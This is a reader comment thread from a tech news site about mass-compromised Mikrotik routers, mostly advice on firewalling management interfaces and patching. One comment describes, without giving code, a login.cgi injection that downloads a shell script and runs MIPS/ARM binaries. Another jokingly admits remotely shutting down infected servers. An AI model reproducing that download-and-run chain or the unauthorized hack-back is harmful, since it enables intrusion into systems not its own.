nav search
Data Centre Software Security DevOps Business Personal Tech Science Emergent Tech Bootnotes
BOFH
Lectures

back to article
Mikrotik routers pwned en masse, send network data to mysterious box

SNMP

Many organisations use the same set of SNMP strings across the business. If you manage to compromise it for one device then you stand to compromise it for everything.

13
0
Silver badge
Alert

Is that the one I noticed this morning?

Since June there have been a number of requests for '/login.cgi' in my web logs (several hundred) with an obvious code injection exploit in the URL, that wget's a file on a server with a specific IP address (several of these observed, looks like they change periodically) which then loads a binary image for MIPS or ARM processors [as appropriate] into /tmp or one of several other directories that it might be able to download something into...

in any case the script it first downloads is called 'izuku.sh' . I reported my logs and findings to several ISPs who either hosted the machines doing the request, or WERE the host for the downloading.

Not sure if this is the same one the article talks about, but the one I saw has been around since June (according to my logs) and always tries to download that script file which then attempts to download the binary into one of several directories, then load/run it. And I think if you disable remote management on your router, this (apparent) virus won't infect it. But it could be a different one, not the one the article is about. I don/t know. So I mention it anyway, just in case. Details are sometimes useful...

Anyway, if you have a web server, look for access attempts for /login.cgi and you'll probably see it (the one I'm talking about). Again, dunno if it's the same as the one in the article, but is similar, probably.

(the first log entry is 15-June at 14:36, in case anybody wonders)

9
0
Silver badge

Re: Is that the one I noticed this morning?

I'll have to have a look at mine, but the MIPS/ARM binaries will be useless on my CHR.

Besides, if people are existing the management interface to the outside world, surely they'd firewall it to trusted addresses only, no?

2
0
Silver badge

Never underestimate a human's ability to not complete an action properly.

That is a valid remark in all areas of life, but I think it is especially true in IT. Ironically, IT is the only domain where you generally only need a keyboard to do stuff, and even then, people can be too lazy to finish properly.

3
0
Silver badge

Sometimes you need a mouse. Especially with Windows... Besides that, couldn't agree more. It the difference between the sloppy (who are perceived as getting things done) vs the thorough (who are perceived as slow).

Anyway. The current RouterOS doesn't seem to have a fix for this bug. So, blocking the management interface from the outside world it is then! But what's wonderful is that CHR reboots so fast. I don't even have to disconnect from my Citrix session.

0
1
Silver badge

Re: Is that the one I noticed this morning?

And when you reported it to the ISP's their response was? No need to reply immediately, I'll check this page again in a couple of years to see if you've heard back at all...

4
0
Silver badge
Meh

Re: Is that the one I noticed this morning?

unfortunately it seems nothing's been done about the 'izuku.sh' file, though my logs show different IP addresses hosting it now. Yeah, they ignored me. Well that server _IS_ in Poland... they probably can't read or understand the information properly and/or just ignore it because they regularly host criminal services or similar. [I've had 'confirmed kills' before, wtih responses, just not that often - usually it is silently fixed or seems so because the activity stops]. Another possibility is that they leave it on the server to see what IP addresses download it to track the thing. Well I won't interfere with law enforcement if that's the case.

( I also posted the actual URL on USENET, and described it even better there, so not like it's invisible any more, and anyone can see it in web server logs )

Back at the turn o' the century, Code Red lingered for several years after the initial infections started. Someone (allegedly me perhaps?) allegedly had an auto-responder that would allegedly shut down the Code Red infected web server remotely (since it was attempting to spread a virus) via the Code Red back door command/control channel and (allegedly) leave a file on the administrator desktop that said something like "you are an idiot" and explained why the web server was shut down remotely. Both of those factoids should frighten any clueless admin into patching the thing (as it was most likely some old unpatched "oh we have a web server running?" Win2k box in a closet that nobody thought about. But I digress...

0
2

Blocking an external management interface from direct access from the internet is an absolute must. If you have to, VPN access to the box and do it that way. If nothing else the logs on the box fill up with denied SSH requests and the filesystem gets to 100% and the box does funny things up to and including becoming unresponsive...

0
0
Gold badge
Unhappy

When people release a list of developed exploits....

perhaps it would be a good idea to start developing upgrades to nullify them first?

0
1

SNMP

"....the controller oddly seems to be interested in collecting traffic from the relatively obscure SNMP ports 161 and 162."

One possibility is that there is some other exploit in the wild, that transfers information using SNMP, on the basis that SNMP packets to and from almost any device would not be considered out of the ordinary and would be unlikely to trigger an IDS/IPS.

2
0
Silver badge

"from the relatively obscure SNMP ports 161 and 162"

SNMP, obscure? Muahahahaha

Is there any network supervision system not using SNMP?

1
2

Vulnerability is overstated

FFS. This vulnerability was fixed days after it was discovered. We are now 7 dot releases past this fix at 6.42.7 Any decent Network administrator needs to be monitoring and updating the firmware of your products.

Secondly the exploit relies on remote access to your router. What complete idiot allows this? Never let external internet access to your routers configuration. Are you completely crazy. I include a URL with the rule to prevent WAN access

https://0day.city/cve-2018-14847.html

4
0
Silver badge

Re: Vulnerability is overstated

I always put a firewall between the outside world and the inside world with a basic "drop all" rule "unless" I specifically permit it.

2
0
Silver badge
Devil

Re: Vulnerability is overstated

yeah that's definitely different from the one I saw [I followed the rabbit trail to a github site with the python code demonstrating the PoC - it's that old yeah]

2
0
Anonymous Coward

@marcus - Re: Vulnerability is overstated

What complete idiot implements remote access in a consumer firewall ?

3
0

Re: @marcus - Vulnerability is overstated

What complete idiot implements remote access in a consumer firewall ?

I wouldn't call Mikrotik a consumer firewall. They are squarely aimed at the semi-pro through to carrier market segments.

0
0
Gold badge
Unhappy

"What complete idiot implements remote access in a consumer firewall ?"

Simple.

1) Some code monkey that cut and pasted the code from stack exchange

2) Some code monkey that cut and pasted the code from a higher end product and didn't consider if these functions were necessary.

A code monkey is not a code monkey because their coding skills are s**t.

They're a code monkey because of what they choose to do about it.

2
0

POST COMMENT House rules

Not a member of The Register? Create a new account here.

  • Enter your comment

  • Add an icon

The Register - Independent news and views for the tech community. Part of Situation Publishing